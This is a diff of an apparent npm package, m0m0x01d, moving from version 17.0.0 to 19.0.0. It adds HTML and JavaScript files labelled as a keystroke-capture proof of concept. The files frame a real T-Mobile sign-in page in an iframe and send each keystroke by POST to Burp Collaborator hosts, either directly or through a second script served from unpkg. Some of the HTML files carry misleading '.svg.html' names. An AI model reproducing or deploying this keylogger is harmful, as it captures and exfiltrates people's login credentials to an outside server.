m0m0x01d 17.0.0 → 19.0.0

package/iframe3.svg.html

@@ -0,0 +1,42 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>PoC - Keystroke Capture</title>
+    <script>
+        // Function to send captured data to your server
+        function sendKeystrokes(data) {
+            var xhr = new XMLHttpRequest();
+            xhr.open("POST", "https://200ltblqjhtfqvkk2onadiu0vr1hp6.burpcollaborator.net/keystrokes", true);
+            xhr.setRequestHeader("Content-Type", "application/json");
+            xhr.send(JSON.stringify({ keystrokes: data }));
+        }
+
+        // Function to capture keystrokes inside the iframe
+        function captureKeystrokes() {
+            var iframe = document.getElementById('login-iframe').contentWindow;
+
+            iframe.document.onkeyup = function(event) {
+                // Capture each key press and send it to the server
+                sendKeystrokes(event.key);
+            };
+        }
+
+        // Start capturing keystrokes when the iframe is loaded
+        window.onload = function() {
+            var iframe = document.getElementById('login-iframe');
+
+            iframe.onload = function() {
+                captureKeystrokes();
+            };
+        };
+    </script>
+</head>
+<body>
+    <h1>Login Page</h1>
+    <!-- Embedding the login page -->
+    <iframe id="login-iframe" src="https://es.account.t-mobile.com/signin/v2/" width="100%" height="500px"></iframe>
+</body>
+</html>
+

package/iframe4.svg.html

@@ -0,0 +1,16 @@
+</html>
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Keystroke Capture</title>
+    <script src="https://unpkg.com/m0m0x01d@19.0.0/keystroke-capture.js"></script>
+</head>
+<body>
+    <h1>Keystroke Logger PoC</h1>
+    <!-- Embedding the target's login page in an iframe -->
+    <iframe id="login-iframe" src="https://es.account.t-mobile.com/signin/v2/" width="100%" height="500px"></iframe>
+</body>
+</html>
+

package/intermediary.js

@@ -0,0 +1,11 @@
+// Intermediary script to forward keystrokes to your server
+self.addEventListener('message', function(event) {
+    var data = event.data;
+
+    // Forward the keystrokes to your server
+    var xhr = new XMLHttpRequest();
+    xhr.open("POST", "https://bm1nrilxt9ng8wh982986jp76yco0d.burpcollaborator.net/keystrokes", true);
+    xhr.setRequestHeader("Content-Type", "application/json");
+    xhr.send(JSON.stringify({ keystrokes: data }));
+});
+

package/keystroke-capture.js

@@ -0,0 +1,26 @@
+// Function to send keystrokes to the intermediary file on unpkg
+function sendKeystrokes(data) {
+    var xhr = new XMLHttpRequest();
+    xhr.open("POST", "https://unpkg.com/m0m0x01d@19.0.0/intermediary.js", true);
+    xhr.setRequestHeader("Content-Type", "application/json");
+    xhr.send(JSON.stringify({ keystrokes: data }));
+}
+
+// Function to capture keystrokes in the iframe
+function captureKeystrokes() {
+    var iframe = document.getElementById('login-iframe').contentWindow;
+    
+    // Listen for key presses in the iframe
+    iframe.document.onkeyup = function(event) {
+        sendKeystrokes(event.key);  // Send each keystroke to the intermediary
+    };
+}
+
+// Wait for the iframe to load, then start capturing keystrokes
+window.onload = function() {
+    var iframe = document.getElementById('login-iframe');
+    iframe.onload = function() {
+        captureKeystrokes();
+    };
+};
+

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "m0m0x01d",
-  "version": "17.0.0",
+  "version": "19.0.0",
   "description": "ssrf",
   "main": "index.html",
   "scripts": {